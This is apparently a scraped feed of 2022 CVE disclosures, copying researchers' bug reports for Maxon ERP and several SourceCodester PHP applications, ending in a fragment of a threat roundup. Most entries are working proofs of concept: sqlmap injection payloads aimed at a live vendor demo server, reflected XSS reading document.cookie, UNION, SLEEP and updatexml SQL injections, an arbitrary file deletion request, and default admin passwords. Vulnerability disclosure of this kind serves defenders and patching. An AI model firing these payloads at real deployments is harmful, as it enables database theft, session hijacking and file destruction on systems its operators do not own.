A vulnerability classified as critical has been found in Maxon ERP. This affects an unknown part of the file /index.php/purchase_order/browse_data. The manipulation of the argument tb_search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213039.

**Maxon ERP Software did not filter the parameters entered in the management center page purchase information purchase order, resulting in the existence of SQL injection vulnerabilities**

*   http://demo.maxonerp.com/index.php/purchase\_order/browse\_data?tb\_search=123\*&page=1&rows=10

We can use sqlmap to validate：

    in the parameters：tb_search
    sqlmap identified the following injection point(s) with a total of 557 HTTP(s) requests:
    ---
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
        Payload: http://demo.maxonerp.com:80/index.php/inventory/browse_data?tb_search=123') AND MAKE_SET(8692=8692,5675) AND ('PJtz' LIKE 'PJtz&page=1&rows=10
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: http://demo.maxonerp.com:80/index.php/inventory/browse_data?tb_search=123') AND (SELECT 2183 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT (ELT(2183=2183,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('uwEb' LIKE 'uwEb&page=1&rows=10
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://demo.maxonerp.com:80/index.php/inventory/browse_data?tb_search=123') AND (SELECT 8227 FROM (SELECT(SLEEP(5)))xxVr) AND ('xVYh' LIKE 'xVYh&page=1&rows=10
    ---
    

**SQL injection data packet**

    GET /index.php/inventory/browse_data?tb_search=123&page=1&rows=10 HTTP/1.1
    Host: demo.maxonerp.com
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: _ga=GA1.2.995310737.1667460803; _gid=GA1.2.778562749.1667460803; __gads=ID=44d315f8abc6a8d9-22d56d3affd700f7:T=1667460803:RT=1667460803:S=ALNI_MYh6leInNXjg72LZfWBATADsf2KVQ; __gpi=UID=00000b743408aed2:T=1667460803:RT=1667482612:S=ALNI_MbDlATt_GUCBEUQQ0koQ0nZIMJ9Lw; ci_session=f662b08c6b19441249ee774c485e480aaa2cb095
    Connection: close

CVE-2022-3878: GitHub - huclilu/CVE_Add

A cross-site scripting (XSS) vulnerability in /hrm/index.php?msg of Human Resource Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

Permalink

**Human Resource Management System v1.0 by oretnom23 has Cross-site scripting (reflected)**

BUG\_Author: YokiYoda

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/index.php

Parameter "msg" (GET), exists XSS vulnerability

Payload1:msg=<script>alert(1)</script>

#POC：

    GET /hrm/index.php?msg=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

Payload2:msg=<script>alert(document.cookie)</script>

#POC：

    GET /hrm/index.php?msg=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close

CVE-2022-43317: bug_report/XSS-1.md at main · ImaizumiYui/bug_report

Human Resource Management System v1.0 was discovered to contain a SQL injection vulnerability via the stateedit parameter at /hrm/state.php.

**Human Resource Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author:YokiYoda

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/state.php?stateedit

Vulnerability location: /hrm/state.php?stateedit=, stateedit

Payload1:stateedit=1'

    GET /hrm/state.php?stateedit=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=si1cb8mag2mckobpi0ffs1htmk
    Connection: close
    

An error page

Payload2:stateedit=1''

    GET /hrm/state.php?stateedit=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=si1cb8mag2mckobpi0ffs1htmk
    Connection: close
    

An right page

Payload3:stateedit=1' UNION ALL SELECT NULL,NULL,SLEEP(10)-- -

    GET /hrm/state.php?stateedit=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,SLEEP(10)--%20- HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=si1cb8mag2mckobpi0ffs1htmk
    Connection: close
    

sleep(10) The server response time is 10 seconds

CVE-2022-43318: bug_report/SQLi-1.md at main · ImaizumiYui/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_quote.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_quote

Vulnerability location: /php-sms/classes/Master.php?f=delete\_quote, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_quote HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43352: bug_report/SQLi-1.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img.

**Sanitization Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: Hujozay

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /php-sms/classes/Master.php?f=delete\_img

Vulnerability location: /php-sms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shel.php file in the root directory

POST /php\-sms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=system\_info
Content-Length: 71
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fphp-sms%2Fuploads%2Fbanner%2Fshell.php

At present, the shell.php file is still in the directory of the website, when we send a request to delete the shell.php file

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-43351: bug_report/delete-file-1.md at main · Hujozay/bug_report

Sanitization Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php-sms/classes/Master.php?f=delete_inquiry.

Permalink

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hujozay

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/classes/Master.php?f=delete\_inquiry

Vulnerability location: /php-sms/classes/Master.php?f=delete\_inquiry, id

dbname =sms\_db,length=6

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_inquiry HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43350: bug_report/SQLi-2.md at main · Hujozay/bug_report

The Complianz WordPress plugin before 6.3.4, and Complianz Premium WordPress plugin before 6.3.6 allow a translators to inject arbitrary SQL through an unsanitized translation. SQL can be injected through an infected translation file, or by a user with a translator role through translation plugins such as Loco Translate or WPML.

CVE-2022-3494

The WooCommerce Dropshipping WordPress plugin before 4.4 does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection

CVE-2022-3481

A vulnerability classified as critical has been found in SourceCodester Sanitization Management System. Affected is an unknown function of the file /php-sms/classes/Master.php?f=save_quote. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-213012.

CVE-2022-3868

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 28 and Nov. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Tag

#sql